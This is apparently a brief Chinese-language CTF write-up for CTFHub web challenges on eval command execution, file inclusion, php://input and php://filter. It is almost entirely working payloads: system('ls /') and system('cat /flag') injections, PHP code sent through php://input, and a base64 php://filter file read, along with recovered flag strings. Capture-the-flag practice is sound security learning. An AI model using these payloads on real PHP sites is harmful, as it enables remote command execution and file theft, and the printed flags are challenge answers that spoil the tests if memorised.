!!!坚持
eval执行
查看根目录文件
?cmd=system("ls");
查看下一级目录
?cmd=system("ls /");
cat 命令读取文件
?cmd=system("cat /flag_24676");
文件包含
构造playload 传参
?file=shell.txt
查看当前目录下文件
ctfhub=system(“ls”);
下一级
ctfhub=system(“ls /”);
cat查看信息
ctfhub=system(“cat /flag”);
php://input
php://input 伪协议相当于一个削弱post的方法
?file=php://input
抓包消息中<?php system("ls /");?>
<?php system("cat /flag_26957");?>
<?php system("cat /flag_26957");?>
读取源代码
源代码提示flag的位置,并且限制使用伪协议
php://filter 任意文件读取
?file=php://filter/read=convert.base64-encode/resource=/flag
ctfhub{87e82d4ef0cd7ee1f4c849b1}
或者不用加密解密,直接构造也可
?file=php://filter/resource=/flag
远程包含
不知道是否可以?file=php://filter/resource=/flag 任意文件读取 nope
使用php://input 伪协议
?file=php://input
cat命令查看
<?php system("ls /");?> <?php system("cat /flag");?>
ctfhub{77e32053d6db1a2f60cac189}